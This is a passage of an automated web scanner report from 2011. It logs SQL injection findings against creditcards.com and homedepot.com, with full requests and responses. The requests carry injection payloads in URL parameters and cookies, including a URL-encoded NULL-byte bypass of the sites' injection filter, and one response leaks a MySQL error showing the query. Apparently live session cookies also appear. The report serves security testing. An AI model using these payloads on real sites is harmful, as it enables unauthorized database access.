GET /oc//%2522ns%253D%2522netsparker%25280x000132%2529)?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:52 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3554
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:52 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '1'=1'; File: /usr/local/apache2/htdocs/us_pr
...[SNIP]...

Request 2

GET /oc//%2522ns%253D%2522netsparker%25280x000132%2529)?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:52 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705475299761114&data3=0&sid=1889&c=1%27%27%3D1
Vary: Accept-Encoding
Content-Length: 2736
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:52 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.63. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/Netsparker8d82b62392124f8783667c0217ea8f35/

Response 2

1.67. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [THD_SESSION cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The THD_SESSION cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the THD_SESSION cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%00'; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%00''; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

1.68. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [URL parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The URL parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the URL parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc%00'&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:51:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:51:47 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225096227%3a%3bC25%5fEXP%3d1360065096%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:36 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225096227%3a%3bC25%5fEXP%3d1360065096%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:43 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22134%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24188%2c466%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310817103%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225096227%3a%3bC25%5fEXP%3d1360065096%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:43 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228703137%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cz%2f1Hpvzia3yZ7tqr69NFZ9CbZjI%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...

...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc%00''&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; 